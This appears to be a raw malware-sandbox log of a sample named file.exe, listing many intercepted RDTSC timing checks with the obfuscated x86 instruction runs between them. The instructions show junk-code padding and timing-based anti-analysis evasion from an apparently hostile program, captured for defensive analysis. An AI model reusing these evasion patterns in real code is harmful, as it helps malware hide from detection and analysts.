Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090C4C second address: 5090CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D50A5EE1h 0x00000009 sub esi, 299DDAE6h 0x0000000f jmp 00007FB7D50A5EE1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB7D50A5EE0h 0x0000001b xor si, B688h 0x00000020 jmp 00007FB7D50A5EDBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FB7D50A5EE5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50907B6 second address: 50907BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50907BB second address: 509082B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d pushfd 0x0000000e jmp 00007FB7D50A5EE8h 0x00000013 and cx, AA78h 0x00000018 jmp 00007FB7D50A5EDBh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov dx, cx 0x00000026 pushfd 0x00000027 jmp 00007FB7D50A5EDEh 0x0000002c adc cx, C4D8h 0x00000031 jmp 00007FB7D50A5EDBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 509082B second address: 50908B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e pushfd 0x0000000f jmp 00007FB7D509B859h 0x00000014 sbb si, 75D6h 0x00000019 jmp 00007FB7D509B851h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FB7D509B84Ch 0x00000029 adc cl, FFFFFFF8h 0x0000002c jmp 00007FB7D509B84Bh 0x00000031 popfd 0x00000032 mov ch, 85h 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FB7D509B84Dh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50908B3 second address: 50908B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50908B7 second address: 50908BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 509070E second address: 509076F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D50A5EDFh 0x00000009 adc al, FFFFFFFEh 0x0000000c jmp 00007FB7D50A5EE9h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f pushfd 0x00000020 jmp 00007FB7D50A5EE0h 0x00000025 and ecx, 7744B828h 0x0000002b jmp 00007FB7D50A5EDBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50903C9 second address: 50903E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B859h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50903E6 second address: 509041F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB7D50A5EE1h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EDDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A02EB second address: 50A030C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB7D509B858h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A030C second address: 50A0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB7D50A5EE1h 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e push ecx 0x0000000f mov edx, 3D5DAF0Eh 0x00000014 pop edi 0x00000015 pushfd 0x00000016 jmp 00007FB7D50A5EE4h 0x0000001b xor ah, 00000058h 0x0000001e jmp 00007FB7D50A5EDBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB7D50A5EE0h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0368 second address: 50A036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A036C second address: 50A0372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0372 second address: 50A03A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ecx, 65EB0EE7h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FB7D509B84Ah 0x00000018 or ax, 6B18h 0x0000001d jmp 00007FB7D509B84Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0008 second address: 50E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E000C second address: 50E0029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0029 second address: 50E002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E002F second address: 50E0033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0033 second address: 50E006C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB7D50A5EE1h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov bx, 67C2h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0453 second address: 50B0477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0477 second address: 50B047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B047B second address: 50B0481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0481 second address: 50B0487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0487 second address: 50B04FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, 73D4h 0x00000011 mov dl, F9h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a pushfd 0x0000001b jmp 00007FB7D509B84Dh 0x00000020 and ch, 00000046h 0x00000023 jmp 00007FB7D509B851h 0x00000028 popfd 0x00000029 popad 0x0000002a pushfd 0x0000002b jmp 00007FB7D509B850h 0x00000030 add ecx, 2DC6C1E8h 0x00000036 jmp 00007FB7D509B84Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push edi 0x00000043 pop ecx 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B04FA second address: 50B053D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB7D50A5EE3h 0x00000015 popad 0x00000016 and dword ptr [eax], 00000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB7D50A5EE5h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B053D second address: 50B058A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B857h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax+04h], 00000000h 0x0000000f jmp 00007FB7D509B852h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB7D509B857h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B058A second address: 50B0590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0590 second address: 50B0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 509056D second address: 5090573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090573 second address: 5090577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090577 second address: 50905B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov al, dh 0x00000013 pushfd 0x00000014 jmp 00007FB7D50A5EDCh 0x00000019 xor ah, 00000008h 0x0000001c jmp 00007FB7D50A5EDBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50905B5 second address: 5090640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D509B84Fh 0x00000009 sbb ecx, 0968564Eh 0x0000000f jmp 00007FB7D509B859h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FB7D509B84Fh 0x00000025 and ch, 0000005Eh 0x00000028 jmp 00007FB7D509B859h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FB7D509B850h 0x00000034 xor al, 00000058h 0x00000037 jmp 00007FB7D509B84Bh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0008 second address: 50B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B000C second address: 50B0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0010 second address: 50B0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B02C2 second address: 50B02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov di, EA16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB7D509B859h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B02EB second address: 50B02F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B02F1 second address: 50B02F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0641 second address: 50D0645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0645 second address: 50D064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D064B second address: 50D0684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB7D50A5EDBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EE0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0684 second address: 50D0688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0688 second address: 50D068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D068E second address: 50D06C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, si 0x0000000f mov ch, 1Eh 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 577BCD42h 0x0000001b call 00007FB7D509B853h 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D06C7 second address: 50D06FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov al, bl 0x0000000f popad 0x00000010 mov eax, dword ptr [76FB65FCh] 0x00000015 pushad 0x00000016 push edx 0x00000017 mov edi, eax 0x00000019 pop esi 0x0000001a popad 0x0000001b test eax, eax 0x0000001d pushad 0x0000001e push edi 0x0000001f mov edi, eax 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ax, dx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D06FF second address: 50D0742 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB7D509B84Fh 0x00000008 sub al, FFFFFFAEh 0x0000000b jmp 00007FB7D509B859h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 je 00007FB846EFEA7Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edi, 580C110Eh 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0742 second address: 50D0748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0748 second address: 50D07C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB7D509B84Eh 0x00000014 sbb ax, A788h 0x00000019 jmp 00007FB7D509B84Bh 0x0000001e popfd 0x0000001f mov ebx, ecx 0x00000021 popad 0x00000022 xor eax, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 mov ax, bx 0x00000029 pushfd 0x0000002a jmp 00007FB7D509B84Dh 0x0000002f xor eax, 4C1C36A6h 0x00000035 jmp 00007FB7D509B851h 0x0000003a popfd 0x0000003b popad 0x0000003c and ecx, 1Fh 0x0000003f pushad 0x00000040 mov dl, ah 0x00000042 pushad 0x00000043 mov si, di 0x00000046 mov si, di 0x00000049 popad 0x0000004a popad 0x0000004b ror eax, cl 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D07C5 second address: 50D07DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D07DB second address: 50D0828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B857h 0x0000000b sub cl, FFFFFFEEh 0x0000000e jmp 00007FB7D509B859h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 leave 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB7D509B84Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0828 second address: 50D0838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0838 second address: 50D087E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00762014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FB7D9A4BFC9h 0x00000023 push FFFFFFFEh 0x00000025 jmp 00007FB7D509B857h 0x0000002a pop eax 0x0000002b jmp 00007FB7D509B856h 0x00000030 ret 0x00000031 nop 0x00000032 push eax 0x00000033 call 00007FB7D9A4BFF3h 0x00000038 mov edi, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push ebx 0x0000003e pop eax 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D087E second address: 50D08EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB7D50A5EDEh 0x00000011 sbb cx, 15B8h 0x00000016 jmp 00007FB7D50A5EDBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB7D50A5EE8h 0x00000022 or esi, 3D92D018h 0x00000028 jmp 00007FB7D50A5EDBh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D08EB second address: 50D08F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D08F1 second address: 50D090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D090D second address: 50D0911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0911 second address: 50D0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, esi 0x0000000e mov ecx, 03FD67BBh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0925 second address: 50D0935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0935 second address: 50D095F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB7D50A5EE5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D095F second address: 50D096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D096F second address: 50D097D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ecx, ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080032 second address: 5080038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080038 second address: 508003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508003C second address: 508005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D509B856h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508005F second address: 5080063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080063 second address: 5080069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080069 second address: 50800F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5ED44E83h 0x00000008 mov si, 4FDFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB7D50A5EE0h 0x00000019 xor ax, B648h 0x0000001e jmp 00007FB7D50A5EDBh 0x00000023 popfd 0x00000024 call 00007FB7D50A5EE8h 0x00000029 pushfd 0x0000002a jmp 00007FB7D50A5EE2h 0x0000002f adc eax, 5098DBD8h 0x00000035 jmp 00007FB7D50A5EDBh 0x0000003a popfd 0x0000003b pop ecx 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FB7D50A5EE1h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50800F4 second address: 50800FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50800FA second address: 5080124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov ax, F3B9h 0x00000014 popad 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB7D50A5EDBh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080124 second address: 508012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508012A second address: 508012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508012E second address: 5080188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB7D509B84Eh 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FB7D509B850h 0x00000014 xchg eax, ebx 0x00000015 jmp 00007FB7D509B850h 0x0000001a push eax 0x0000001b jmp 00007FB7D509B84Bh 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB7D509B850h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080188 second address: 5080197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080197 second address: 508019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
